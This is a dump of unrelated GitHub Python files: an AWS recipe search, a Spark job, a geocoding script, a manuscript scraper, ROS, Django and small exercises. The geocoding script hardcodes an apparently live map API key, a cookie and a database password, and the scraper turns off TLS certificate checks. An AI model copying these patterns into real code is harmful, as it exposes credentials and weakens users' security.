aws_access_key_id=\"*\")\n recipe_table = dynamodb.Table(\"recipe\")\n visitors_table = dynamodb.Table(\"user\")\n\n host = '*'\n region = 'us-east-1'\n service = 'es'\n access_access_key_id = \"*\"\n access_secrect_access_key = \"*\"\n awsauth = AWS4Auth(access_access_key_id, access_secrect_access_key, region, service)\n\n # fuzzy search setting:\n # fuzziness: allow up to 2 characters to change\n # fuzzy_max_expansions: expand up to 50 characters for fuzzy matches\n # fuzzy_prefix_length: 1 character at the beginning of terms should not be changed for fuzzy matches\n json_q = json.dumps({\n \"query\": {\n \"query_string\": {\n \"query\": \" \".join(ingredients),\n \"fuzziness\": 2,\n \"default_operator\": \"OR\",\n \"fuzzy_max_expansions\": 50,\n \"fuzzy_prefix_length\": 1,\n },\n },\n \"size\": 20\n })\n\n headers = {'Content-Type': 'application/json'}\n r = requests.get(host + \"/\" + \"recipes\" + \"/_search\", auth=awsauth, data=json_q, headers=headers)\n res = json.loads(r.text)\n\n reply = \"\"\n for i in range(len(res[\"hits\"][\"hits\"])):\n try:\n recipe_id = res[\"hits\"][\"hits\"][i][\"_id\"]\n response = recipe_table.query(KeyConditionExpression=Key(\"recipe_id\").eq(recipe_id))\n reply = json.dumps({\n \"recipe_id\": recipe_id,\n \"minutes\": str(response[\"Items\"][0][\"minutes\"]),\n \"name\": response[\"Items\"][0][\"name\"],\n \"tags\": response[\"Items\"][0][\"tags\"],\n })\n except Exception as e:\n print(e)\n\n new_history = {\n 'picture_url': picture_url,\n 'search_time': search_time,\n 'query': ' '.join(ingredients)\n }\n response = visitors_table.get_item(Key={\"user_id\": user_id})\n user = (response[\"Item\"] if \"Item\" in response else None)\n if user == None:\n item = {\"user_id\": user_id, }\n response = visitors_table.put_item(Item=item)\n response = visitors_table.get_item(Key={\"user_id\": user_id})\n user = (response[\"Item\"] if \"Item\" in response else None)\n\n query_history = user[\"query_history\"] if \"query_history\" in user else []\n query_history.append(new_history)\n query_history_len = len(query_history)\n if query_history_len > 10:\n query_history = query_history[query_history_len - 10:]\n\n response = visitors_table.update_item(Key={\"user_id\": user_id},\n UpdateExpression=\"set query_history=:h\",\n ExpressionAttributeValues={\":h\": query_history})\n return {\n 'statusCode': 200,\n 'body': json.dumps(reply)\n 
}\n","repo_name":"tonywyb/AIChef","sub_path":"backend/searchRecipe.py","file_name":"searchRecipe.py","file_ext":"py","file_size_in_byte":3251,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"41047040218","text":"#!/usr/bin/env python\n\nimport sys\nimport re\nimport json\nfrom operator import add\n\nfrom pyspark import SparkContext, SparkConf\nfrom pyspark.sql import SQLContext,Row\nconf=SparkConf().setAppName(\"TransactionEvaluation\")\nsc=SparkContext(conf=conf)\nsqlContext=SQLContext(sc)\nif __name__ == \"__main__\":\n if len(sys.argv) != 3:\n print(\"Usage: need two files as parameters 1. Input_StartOfDay_Positions.txt 2. Input_Transactions.txt\", file=sys.stderr)\n sys.exit(-1)\n\n # read Input_StartOfDay_Positions.txt ignoring column header\n lines = sc.textFile(sys.argv[1])\n dataLines = lines.filter(lambda h: \"Instrument\" not in h)\n inpStartDayPosition = dataLines.map(lambda l: l.split(\",\"))\n dfInpStartDayPosition = inpStartDayPosition.toDF([\"Instrument\", \"Account\", \"AccountType\", \"Quantity\"])\n\n # read Input_Transactions.txt\n inpTransactionjsonRDD = sc.wholeTextFiles(sys.argv[2]).map(lambda x : x[1])\n js = inpTransactionjsonRDD.map(lambda x: re.sub(r\"\\s+\", \"\", x, re.UNICODE))\n transactions = sqlContext.jsonRDD(js)\n # Join both datasets and get aggregated transaction value (buy and sell) for complete day.\n transPositionJoin = dfInpStartDayPosition.join(transactions, dfInpStartDayPosition.Instrument == transactions.Instrument, 'leftouter').drop(transactions.Instrument).drop(transactions.TransactionId)\n transPositionJoinAgg = transPositionJoin.groupBy(\"Instrument\",\"Account\",\"AccountType\",\"Quantity\",\"TransactionType\").agg({\"TransactionQuantity\": \"sum\"})\n\n def calculateTransactions(line):\n instrument = line[0]\n account = int(line[1])\n accountType = line[2]\n quantity = int(line[3])\n transactionType = line[4]\n sumTransactionQuantity = line[5]\n if accountType == \"E\" and transactionType == \"B\":\n sumTransactionQuantity = sumTransactionQuantity * -1\n if accountType == \"I\" and transactionType == \"S\":\n sumTransactionQuantity = sumTransactionQuantity * -1\n return (instrument, account, accountType, quantity, sumTransactionQuantity)\n\n transPositionJoinDelta = transPositionJoinAgg.map(calculateTransactions)\n dfTransPositionJoinDelta = transPositionJoinDelta.toDF([\"instrument\", \"account\", \"accountType\", \"quantity\", \"delta\"])\n dfTransPositionJoinDeltaAgg = dfTransPositionJoinDelta.groupBy(\"instrument\", \"account\", \"accountType\", \"quantity\").agg({\"delta\": \"sum\"}).withColumnRenamed(\"sum(delta)\",\"delta\").na.fill(0)\n dfEndofDayPosition = dfTransPositionJoinDeltaAgg.select(dfTransPositionJoinDeltaAgg['instrument'],dfTransPositionJoinDeltaAgg['account'],dfTransPositionJoinDeltaAgg['accountType'],dfTransPositionJoinDeltaAgg['quantity'] - dfTransPositionJoinDeltaAgg['delta'], dfTransPositionJoinDeltaAgg['delta'])\n rddEndofDayPositionAbs = dfEndofDayPosition.map(lambda r : Row(instrument=r[0], account=r[1], accountType=r[2], quantity=r[3], delta=r[4], absDelta=abs(r[4])))\n dfEndofDayPositionAbs = sqlContext.createDataFrame(rddEndofDayPositionAbs)\n dfEndofDayPositionSorted = dfEndofDayPositionAbs.sort(\"absDelta\", ascending=False)\n dfEndofDayPositionSortedOutput = 
dfEndofDayPositionSorted.select(dfEndofDayPositionSorted['instrument'],dfEndofDayPositionSorted['account'],dfEndofDayPositionSorted['accountType'],dfEndofDayPositionSorted['quantity'],dfEndofDayPositionSorted['delta'])\n dfEndofDayPositionSortedOutput.rdd.map(lambda l: (l[0].encode('ascii', 'ignore'),l[1],l[2].encode('ascii', 'ignore'),l[3],l[4])).saveAsTextFile(\"/user/training/EndofDayPosition_Output.txt\")\n\n #to display largest and lowest net transaction volumes for the day\n print(\"largest & lowest transactions:\", dfEndofDayPositionSortedOutput.head(2))\n\n #sqlContext.stop()\n sys.exit(0)\n","repo_name":"sagarGitcode/SagarKamble_Python","sub_path":"spark_transactions_evaluation.py","file_name":"spark_transactions_evaluation.py","file_ext":"py","file_size_in_byte":3735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"5542373178","text":"import requests\nimport json\nimport time\nimport random\nimport pandas as pd\nimport pymysql\n\ndef connection():\n conn = pymysql.connect(\n host='localhost',\n user='root',\n password='admin',\n db='circuit',\n charset='utf8mb4',\n cursorclass=pymysql.cursors.DictCursor\n )\n return conn\n\n\ndef get_job():\n conn = connection()\n cursor = conn.cursor()\n sql_str = \"SELECT DISTINCT com_name FROM job_shanghai_clean_final_3 WHERE job_address = '上海'\"\n cursor.execute(sql_str)\n results = cursor.fetchall()\n cursor.close()\n conn.close()\n return results\n\ndef get_part_name(org_name):\n url = \"https://restapi.amap.com/v3/place/text\"\n params = {\n 'key': '1f950b2dd2067775c0a1de7be920cda0',\n 'keywords': org_name,\n 'types': '科教文化服务',\n 'city': '上海',\n # 'offset': 10,\n # 'output':'JSON',\n }\n headers = {\n 'Cookie': 'BAIDUID=FBAA261874C5A1FCE6DBA9B6FA4F06B5:FG=1'\n }\n try:\n response = requests.request(\"GET\", url, headers=headers, params=params,timeout=10)\n # print(response.text)\n rs_json = json.loads(response.text)\n # print(rs_json)\n\n part_name = str(rs_json['pois'][0]['adname'])\n # print(part_name)\n # print('所在行政区{}'.format(part_name))\n return part_name\n except Exception as e:\n print(e)\n return ''\n\ndef update_data(com_name, job_address):\n conn = connection()\n cursor = conn.cursor()\n sql = \"update `job_shanghai_clean_final_3` set job_address='{}' where com_name = '{}'\".format(\n job_address, com_name)\n # print(sql)\n cursor.execute(sql)\n conn.commit()\n cursor.close()\n conn.close()\n\ndef main():\n results = get_job()\n print('数据输入完成{}'.format(len(results)))\n i=0\n for rs in results:\n # org_id = row['org_id']\n org_name = rs['com_name']\n if type(org_name) is float:\n print('无中文')\n part_name=''\n else:\n org_name = org_name.strip().replace('。','')\n # lng,lat = get_lng_lat(org_name)\n part_name = get_part_name(org_name)\n if '[' in part_name or part_name =='':\n print('{}找不到地区'.format(org_name))\n part_name = ''\n continue\n part_name = '上海-'+part_name\n print(\"{}是:{}\".format(org_name, part_name))\n # update_date_lng_lat(shop_id,lng,lat)\n # print(lng,lat)\n update_data(org_name, part_name)\n # break\n time.sleep(0.4)\n\nmain()","repo_name":"SherryLee725/circuit_talent_needs","sub_path":"job_place.py","file_name":"job_place.py","file_ext":"py","file_size_in_byte":2611,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"14448207170","text":"import requests\nfrom bs4 import BeautifulSoup\nimport csv\nfrom time import sleep\nimport sys\nsys.path.append('../../classes')\nimport notify\n\n# import 
ssl\n# ssl._create_default_https_context = ssl._create_unverified_context\n\n\ndef scrape_for_page(url):\n flg = True\n\n print(\"page\\t\" + url)\n\n sleep(1)\n\n r = requests.get(url,verify=False)\n\n # htmlをBeautifulSoupで扱う\n soup = BeautifulSoup(r.text, \"lxml\")\n\n if soup.find(class_=\"view-content\") == None:\n return False\n\n arr_a = soup.find(class_=\"view-content\").find_all(\"a\")\n\n if len(arr_a) > 0:\n for element_a in arr_a:\n\n href = element_a.get(\"href\")\n\n sleep(1)\n\n html = requests.get(\"https://www.iiif.ku-orcas.kansai-u.ac.jp/\"+href,verify=False)\n\n # htmlをBeautifulSoupで扱う\n soup = BeautifulSoup(html.text, \"lxml\")\n\n aas = soup.find_all(\"a\")\n\n manifest = \"\"\n\n for a in aas:\n href = a.get(\"href\")\n if href and \"manifest.json\" in href:\n manifest = href\n break\n\n if manifest != \"\":\n\n print(manifest)\n manifest_arr.append(manifest)\n\n if len(manifest_arr) % 100 == 1:\n notify.Notify.send(\"kansai\\t\"+str(len(manifest_arr)))\n\n else:\n flg = False\n\n return flg\n\n\nif __name__ == '__main__':\n\n manifest_arr = []\n\n output_path = \"data/manifest_list.csv\"\n\n url_array = [\n \"https://www.iiif.ku-orcas.kansai-u.ac.jp/books?page=\", \n \"https://www.iiif.ku-orcas.kansai-u.ac.jp/osaka_gadan?page=\", \n \"https://www.iiif.ku-orcas.kansai-u.ac.jp/hakuen_bunko?page=\", \n \"https://www.iiif.ku-orcas.kansai-u.ac.jp/hakuen_yinpu?page=\"\n ]\n\n for base_url in url_array:\n\n loop_flg = True\n page = 1\n\n while loop_flg:\n url = base_url + str(page)\n\n loop_flg = scrape_for_page(url)\n\n page += 1\n\n f = open(output_path, 'w')\n\n writer = csv.writer(f, lineterminator='\\n')\n writer.writerow([\"Manifest\"])\n\n for manifest in manifest_arr:\n writer.writerow([manifest])\n\n f.close()\n","repo_name":"nakamura196/iiif","sub_path":"src/collections/kansai/createManifestList.py","file_name":"createManifestList.py","file_ext":"py","file_size_in_byte":2199,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"77"} +{"seq_id":"34719936881","text":"from PySide6.QtWidgets import QWidget, QLabel, QVBoxLayout, QHBoxLayout, QPushButton, QListWidget, \\\n QInputDialog, QLineEdit\n\nfrom GlobalSettings import global_settings\n\n\nclass SecondaryFolderChooseWidget(QWidget):\n def __init__(self):\n super(SecondaryFolderChooseWidget, self).__init__()\n self.setup_ui()\n\n def setup_ui(self):\n layout_main = QVBoxLayout()\n layout_main.setContentsMargins(0, 0, 0, 0)\n layout_main.setSpacing(0)\n layout_title = QHBoxLayout()\n layout_title.setContentsMargins(0, 0, 0, 0)\n layout_title.setSpacing(0)\n title_label = QLabel(\"需要处理的二级文件夹名称\")\n title_label.setStyleSheet(\"font-size: 15px; color: #000000;\")\n layout_title.addWidget(title_label)\n layout_title.addStretch(1)\n self.add_folder_button = QPushButton(\"添加\")\n self.add_folder_button.setStyleSheet(f\"\"\"\n QPushButton {{\n font-size: 14px;\n color: #000000;\n background-color: #FFFFFF;\n border: 1px solid #000000;\n border-radius: 5px;\n }}\"\"\")\n self.add_folder_button.setFixedSize(60, 30)\n self.add_folder_button.clicked.connect(self.add_folder_button_clicked)\n layout_title.addWidget(self.add_folder_button)\n layout_title.addSpacing(5)\n self.delete_folder_button = QPushButton(\"删除\")\n self.delete_folder_button.setStyleSheet(f\"\"\"\n QPushButton {{\n font-size: 14px;\n color: #000000;\n background-color: #FFFFFF;\n border: 1px solid #000000;\n border-radius: 5px;\n }}\"\"\")\n self.delete_folder_button.setFixedSize(60, 30)\n 
self.delete_folder_button.clicked.connect(self.delete_folder_button_clicked)\n layout_title.addWidget(self.delete_folder_button)\n layout_main.addLayout(layout_title)\n layout_main.addSpacing(5)\n layout_hint = QHBoxLayout()\n layout_hint.setContentsMargins(0, 0, 0, 0)\n layout_hint.setSpacing(0)\n hint_label = QLabel(\"如输入”同人志“,则所有名称中含有”同人志“的二级文件夹都会被处理。\\n如果此处不输入任何内容,则全部适用是否复制未选二级文件夹设置项。\")\n hint_label.setStyleSheet(\"font-size: 12px; color: #000000;\")\n layout_hint.addWidget(hint_label)\n layout_main.addLayout(layout_hint)\n layout_main.addSpacing(5)\n self.show_list = QListWidget()\n self.show_list.setStyleSheet(\"\"\"\n QListWidget {\n font-size: 12px;\n color: #000000;\n background-color: #7f7f7f;\n border: 2px solid #000000;\n border-radius: 5px;\n outline: none;\n }\n QListWidget::item {\n height: 30px;\n padding: 5px;\n background-color: #aaaaaa;\n }\n QListWidget::item:selected {\n background-color: #dddddd;\n color: #000000;\n }\"\"\")\n for name in global_settings.choose_folder_names:\n self.show_list.addItem(name)\n layout_main.addWidget(self.show_list)\n self.setLayout(layout_main)\n\n def add_folder_button_clicked(self):\n new_path = QInputDialog.getText(self, \"二级文件夹设置\", \"请输入二级文件夹筛选词\", QLineEdit.Normal)\n if new_path[0] and new_path[1]:\n for name in global_settings.choose_folder_names:\n if new_path[0] == name:\n return\n global_settings.choose_folder_names.append(new_path[0])\n self.show_list.clear()\n for name in global_settings.choose_folder_names:\n self.show_list.addItem(name)\n\n def delete_folder_button_clicked(self):\n if self.show_list.currentItem() is None:\n return\n global_settings.choose_folder_names.remove(self.show_list.currentItem().text())\n self.show_list.clear()\n for name in global_settings.choose_folder_names:\n self.show_list.addItem(name)\n","repo_name":"Overseer-Council/handleComicCollection","sub_path":"Widgets/SecondaryFolderChoose.py","file_name":"SecondaryFolderChoose.py","file_ext":"py","file_size_in_byte":4107,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"6670018486","text":"# 덧칠하기\ndef solution(n, m, section):\n answer = 0\n l = 0\n\n for i in section:\n if i <= l:\n continue\n l = i + m - 1\n answer += 1\n\n return answer\n\nprint(solution(8, 4, [2, 3, 6]))","repo_name":"surpmh/algorithms","sub_path":"Programmers/level1/161989.py","file_name":"161989.py","file_ext":"py","file_size_in_byte":226,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"12260193456","text":"#!/usr/bin/env python3\r\nimport rospy\r\nfrom std_msgs.msg import String\r\nfrom geometry_msgs.msg import Twist\r\nfrom Motors import MotorLib\r\n\r\n\r\nmotors = MotorLib.Motors()\r\n\r\ndef callback(data):\r\n rospy.loginfo(\"Received Command: {0}\\n{1}\".format(data.linear, data.angular))\r\n x = data.linear.x\r\n w = data.angular.z\r\n if (w == 0):\r\n if (x>0):\r\n motors.forward(x*10)\r\n else:\r\n motors.backward(-x*10)\r\n else:\r\n if (w>0):\r\n motors.left(w*10)\r\n else:\r\n motors.right(-w*10)\r\n\r\ndef listener():\r\n rospy.init_node('firefighter_velReceiver', anonymous=True)\r\n\r\n rospy.Subscriber(\"firefighter/cmd_vel\", Twist, callback)\r\n rospy.loginfo(\"Initialised Node\")\r\n # spin() simply keeps python from exiting until this node is stopped\r\n rospy.spin()\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n try:\r\n listener()\r\n except rospy.ROSInterruptException:\r\n pass\r\n finally:\r\n motors.exit()\r\n print(\"Finished 
Operation\")\r\n\r\n    \r\n\r\n    \r\n","repo_name":"csmithcripps/controller_firefighter","sub_path":"scripts/velReceiver.py","file_name":"velReceiver.py","file_ext":"py","file_size_in_byte":1038,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
{"seq_id":"45489534916","text":"import numpy as np\nfrom tqdm import tqdm\nfrom gensim.models import Word2Vec\nfrom nltk.tokenize import sent_tokenize\n\nfrom data_preprocessor import DataPreprocessor\n\n\nclass Word2VecWrapper:\n\n    def __init__(self):\n        self.data_preprocessor = DataPreprocessor()\n        self.model = None\n\n    def fit(self, data):\n        sentences = self.data_preparing(data)\n        self.model = Word2Vec(sentences, vector_size=500, window=5, min_count=5, epochs=10)\n\n    def transform(self, data):\n        sentences = self.data_preparing(data)\n        embedded_sentences = np.array([])\n        for sentence in tqdm(sentences):\n            vector = [self.model.wv[word] for word in sentence\n                      if word in list(self.model.wv.key_to_index.keys())]\n            if vector:\n                vector = np.mean(vector, axis=0)\n                embedded_sentences = vector if embedded_sentences.size == 0 else np.vstack((embedded_sentences, vector))\n        return embedded_sentences\n\n    def data_preparing(self, data):\n        return [self.data_preprocessor.run_pipeline(sent) for sent in sent_tokenize(' '.join(data), 'russian')]\n","repo_name":"answerIII/Chatbot","sub_path":"src/word2vec.py","file_name":"word2vec.py","file_ext":"py","file_size_in_byte":1130,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
{"seq_id":"9963719044","text":"with open(\"inputs/09.txt\", \"r\") as f:\n    data=f.read().strip()\nlines = data.split(\"\\n\")\n\ndef move_tail(r1,r2):\n    (x,y),(xt,yt) = r1, r2\n    dx_abs, dy_abs = abs(x-xt), abs(y-yt)\n    if dx_abs>1:\n        xt = xt-1 if x<xt else xt+1\n        if dy_abs>0:\n            yt = yt-1 if y<yt else yt+1\n    elif dy_abs>1:\n        yt = yt-1 if y<yt else yt+1\n        if dx_abs>0:\n            xt = xt-1 if x.\n'''\n\nimport os\nimport re\nimport sys\nimport time\nfrom pathlib import Path\n#from struct import pack, unpack\n\n# TODO: relative import. 
fix this latter.\nsys.path.append(\".\")\nfrom py import lsh\n\n\n\ndef parse_tc(path):\n parsed_tc = ''\n with open(path, 'r') as fin:\n line = fin.readline()\n while line:\n if line != \"\\n\":\n newline = line.strip()\n parsed_tc += newline + \" \"\n line = fin.readline()\n parsed_tc = re.sub(' +', ' ', parsed_tc.strip())\n return parsed_tc\n\n\n# TODO: store a single pickle file for each test\ndef preprocess_test_cases(inputdir, outputdir, singlefile=True):\n if singlefile:\n with open(JTeC_preproc_single, 'w') as fout, open(JTeC_preproc_map, 'w') as mapfile:\n for path in Path(JTeC_dir).rglob('*.java'): # java files\n tc = parse_tc(path) # parses the test files to remove line breaks and empty lines\n fout.write(tc + '\\n')\n mapfile.write(str(path.relative_to(JTeC_dir)) + '\\n')\n else:\n tcID = 1\n with open(JTeC_preproc_map, 'w') as mapfile:\n for path in Path(JTeC_dir).rglob('*.java'): # java files\n outfile = os.path.join(JTeC_preproc_dir, '{}.txt'.format(tcID))\n with open(outfile, 'w') as fout:\n tc = parse_tc(path) # parses the test files to remove line breaks and empty lines\n fout.write(tc)\n mapfile.write(str(path.relative_to(JTeC_dir)) + '\\n')\n tcID += 1\n \n\n# TODO: skip preprocessing if already done\ndef storeSignatures():\n mh_t = time.perf_counter() \n with open(mapfileloc, 'w') as mapfile, open(sigfileloc, 'w') as sigfile:\n for path in Path(JTeC_dir).rglob('*.java'): # java files\n tc = parse_tc(path) # parses the test files to remove line breaks and empty lines\n tc_shingles = set()\n for i in range(len(tc) - k + 1):\n tc_shingles.add(hash(tc[i:i + k])) \n sig = lsh.tcMinhashing((None, set(tc_shingles)), hashes)\n\n #print(sig)\n\n for hash_ in sig:\n #sigfile.write(repr(unpack('>d', hash_)[0]))\n sigfile.write(hash_)\n sigfile.write(\" \")\n sigfile.write(\"\\n\")\n\n mapfile.write(str(path.relative_to(JTeC_dir)) + '\\n')\n mh_time = time.perf_counter() - mh_t\n with open(sigtimefileloc, \"w\") as fout:\n fout.write(repr(mh_time)) \n\n\n\nif __name__ == '__main__':\n #JTeC_dir = '/home/breno/research/JTEC/JTeC-Bundle/JTeC/'\n JTeC_dir = 'scalability/input/JTeC'\n mapfileloc = 'scalability/input/JTeC_map.txt'\n sigfileloc = 'scalability/input/JTeC.sig'\n sigtimefileloc = 'scalability/input/JTeC_sigtime.txt'\n #-----\n JTeC_preproc_dir = 'scalability/input/JTeC_preproc'\n JTeC_preproc_single = 'scalability/input/JTeC_preproc_all.txt'\n JTeC_preproc_map = 'scalability/input/JTeC_preproc_all_map.txt'\n\n if not os.path.exists(JTeC_preproc_dir):\n os.makedirs(JTeC_preproc_dir)\n\n # TODO: add all FAST parameters in a config file\n # FAST parameters\n k, n, r, b = 5, 10, 1, 10\n\n hashes = [lsh.hashFamily(i) for i in range(n)]\n\n #storeSignatures()\n \n preprocess_test_cases(JTeC_dir, JTeC_preproc_dir, singlefile=True)\n #preprocess_test_cases(JTeC_dir, JTeC_preproc_dir, singlefile=False)","repo_name":"Liviocsouza/FAST","sub_path":"tools/prepare-scalability-input.py","file_name":"prepare-scalability-input.py","file_ext":"py","file_size_in_byte":4183,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"77"} +{"seq_id":"6332872713","text":"\"\"\"project URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.0/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. 
Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf import settings\nfrom django.contrib import admin\nfrom django.views.generic import TemplateView\nfrom django.urls import path, re_path, include\nfrom time import sleep\n\n\ndef sample_api_view(request):\n from django.http import JsonResponse\n\n sleep(2)\n return JsonResponse(\n {\n \"message\": \"\"\"This message is coming from the backend.\n The django view is inside `project/urls.py` and the redux code is in `react-app/src/js/welcome/(actions|reducers).js`.\n Please remove them when starting your project :]\"\"\"\n }\n )\n\n\nfrontend_urls = [\n re_path(r\"^.*$\", TemplateView.as_view(template_name=\"frontend/index.html\")),\n]\n\n\nif not settings.DEBUG:\n frontend_urls.insert(0, path(\"\", include(\"pwa.urls\")))\n\n# if you wish to test the PWA on dev, uncomment the following lines,\n# so that django serves static files.\n# remember to built the frontend manually and run collectstatic as well.\n# from django.views.static import serve\n# frontend_urls += [\n# re_path(r'^static/(?P.*)$', serve, {'document_root': settings.STATIC_ROOT})\n# ]\n\nurlpatterns = [\n path(\"admin/\", admin.site.urls),\n path(\"api/sample-api-view/\", sample_api_view),\n] + frontend_urls\n","repo_name":"labcodes/django-react-boilerplate","sub_path":"project/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1877,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"77"} +{"seq_id":"28236063166","text":"# Escape sequence\ntabby_cat = \"\\tI'm tabbed in.\"\npersian_cat = \"I'm split\\non a line.\"\n# \\n stands for ASCII linefeed.\n\nbackslash_cat = \"I'm \\\\ a \\\\ cat.\"\n# \\\\ symbolieses backslash.\n\nfat_cat = \"\"\"\nI'll do a list:\n\\t* Cat food\n\\t* Fishies\n\\t* catnip\\n\\t* Grass\n\"\"\"\n# \\t symbolises horizontal tab (TAB)\n\nprint(tabby_cat)\nprint(persian_cat)\nprint(backslash_cat)\nprint(fat_cat)\n\n# test a few escape sequence below:\nbackslash = \"\\\\ backslash\"\nsingle_quote = \"\\' single-quote\"\ndouble_quote = \"\\\" double-quote\"\nASCII_bell = \"\\a ASCII bell\"\nASCII_backspace = \"\\b ASCII backspace\"\nASCII_formfeed = \"\\f ASCII Formfeed\"\nASCII_linefeed = \"\\n ASCII Linefeed\"\nCarriage_return = \"\\r Carriage return\"\nHorizontal_return = \"\\t Horizontal return\"\nASCII_vertical_tab = \"\\v ASCII vertical tab\"\n\nprint(backslash)\nprint(single_quote)\nprint(double_quote)\nprint(ASCII_bell)\nprint(ASCII_backspace)\nprint(ASCII_formfeed)\nprint(ASCII_linefeed)\nprint(Carriage_return)\nprint(Horizontal_return)\nprint(ASCII_vertical_tab)\nprint('''\nHow will it appear\nIf I change double-quotes\ninto single-quotes?\n''')\n# as far as it appears,\n# three single-quotes serve as the same thing as three double-quotes.\n# Am I right?\n\nanswer = \"\"\"\n\\b\\\"I do not have any apple, but I have other stuff.\\\"\n\\t* Pineaplle\\n\\t* Banana\\n\\t* Pear\\n\\t* Orange\\n\\t* Tomato\\r\n\\\"So do you want any of these?\\\"\n\"\"\"\n\nprint('Mc\\'Donalds asked: \"How many apples do you have?\"')\nprint(f\"Irvin answerd: {answer}\")\nprint(\"What a sad 
story!\")\n","repo_name":"espererwyd/PythonFile","sub_path":"ex10.py","file_name":"ex10.py","file_ext":"py","file_size_in_byte":1468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"30198477392","text":"import streamlit as slt\n\n# import requests\n# from bs4 import BeautifulSoup\n\n# baseUrl = \"http://gepia.cancer-pku.cn/detail.php\"\n# query = {\"gene\": \"ERBB2\", \"tag\": \"expdiy\"}\n\n# res = requests.post(url=baseUrl, data=query)\n# # response.text\n# # slt.markdown(response.text[17:], unsafe_allow_html=True)\n# # response.text[17:]\n# soup = BeautifulSoup(res.text, \"html.parser\")\n# soup.current_data\n# with open(\"temp.html\", \"wb\") as fout:\n# fout.write(res.content)\n\nimport gepia\n\nbp = gepia.boxplot()\nslt.text(str(bp.showParams()))\n\nslt.write(gepia.CANCERType)\nbp.setParam(\"dataset\", gepia.CANCERType)\nresult = bp.query()\n\n# IFrame(result, width=500, height=500)\n","repo_name":"TeddyHuang-00/Bioinformatics-Lab","sub_path":"hw7/cancer.py","file_name":"cancer.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"9991355992","text":"from django.shortcuts import render, HttpResponse, redirect\nfrom .models import *\nfrom django.template.defaulttags import register\n# Create your views here.\nfrom quiz.dto import *\nfrom quiz.services import *\nimport re\nimport copy\n@register.filter\ndef get_answer_with_uuid(value):\n uuid = 1\n result = []\n for a in value:\n result.append({\"answer\":a,\"uuid\":uuid})\n uuid+=1\n return result\n\n\n@register.filter\ndef check_old_answer(uuid,cookies):\n for a in cookies:\n print(a)\n if a == \"uuid\"+str(uuid):\n b = cookies.get(a).split(\" \")\n buffer = []\n for a in b:\n try:\n buffer.append(int(a))\n except Exception:\n pass\n return buffer\n\n\ndef start(request):\n\n ren = render(request, \"start.html\")\n for a in request.COOKIES:\n ren.delete_cookie(a)\n return ren\n\n\ndef questions(request, number):\n def save_result():\n '''\n Записывает переданные пользователем значения в cookie\n '''\n def get_form_request_get():\n '''\n функция возврощает результат ответа пользователя\n '''\n result = \"\"\n if request.GET.get(\"previous\") != None:\n return result\n result = \" \"\n for a in request.GET:\n if a != \"previous\":\n result += str(a)+\" \"\n return result\n if get_form_request_get() != \"\":\n questions_render.set_cookie(\"uuid\"+str(int(number)-1), get_form_request_get())\n new_question_url = {\"have\": False, \"url\": \"\"}\n old_question_url = {\"have\": False, \"url\": \"\"}\n def check_new_question_url(new_question_url):\n '''\n функция возвращает url на новый вопрос если такое возможно\n '''\n try:\n Question.objects.get(uuid=int(number)+1)\n return {\"have\": True, \"url\":\"/questions_\"+str(int(number)+1), }\n except Exception:\n pass\n\n def check_old_question_url(old_question_url):\n '''\n функция возвращает url на старый вопрос если такое возможно\n '''\n try:\n Question.objects.get(uuid=int(number)-1)\n return {\"have\": True, \"url\":\"/questions_\"+str(int(number)-1),}\n except Exception:\n pass\n\n try:\n question = Question.objects.get(uuid = int(number))\n answer = Choice.objects.filter(Question = question)\n new_question_url = check_new_question_url(new_question_url)\n old_question_url = check_old_question_url(old_question_url)\n except Exception as e:\n def check_last_number():\n '''\n функция возвращает в виде числа последний\n записанный 
uuid ответа пользователя\n '''\n last_count = \"\"\n max = 0\n for b in request.COOKIES:\n last_count = re.findall(r\"[0-9]{1,3}\", b)\n if int(last_count[0])>int(max):\n max = copy.copy(last_count[0])\n return int(max)\n result_user = \"\"\n for a in request.GET:\n result_user += a + \" \"\n count = check_last_number() + 1\n request.COOKIES['uuid' + str(count)] = result_user\n return result(request)\n\n\n context = {\n \"question\":question,\n \"answer\":answer,\n \"new_question_url\":new_question_url,\n \"old_question_url\":old_question_url,\n 'cookies':request.COOKIES\n }\n questions_render = render(request, 'questions.html', context)\n save_result()\n return questions_render\n\ndef result(request):\n def answer():\n '''\n функция возвращает словарь типа AnswersDTO\n с ответами пользователя считанного из куки\n '''\n list_AnswersDTO = []\n #записываем последний ответ на вопрос\n for a in request.COOKIES:\n try:\n number = re.findall(r\"[0-9]{1,3}\", a)\n one_answer = request.COOKIES.get(\"uuid\"+number[0])\n list_AnswersDTO.append(AnswerDTO(question_uuid=number,\n choices = re.findall(r\"[0-9]{1,3}\", one_answer)))\n except Exception:\n pass\n return list_AnswersDTO\n\n def question():\n '''\n функция возвращает словарь типа QuestionDTO\n с всеми вопросами\n '''\n # заполянме ChoiceDTO и Question\n list_QuestionDTO = []\n for a in Question.objects.all():\n list_ChoiceDTO = 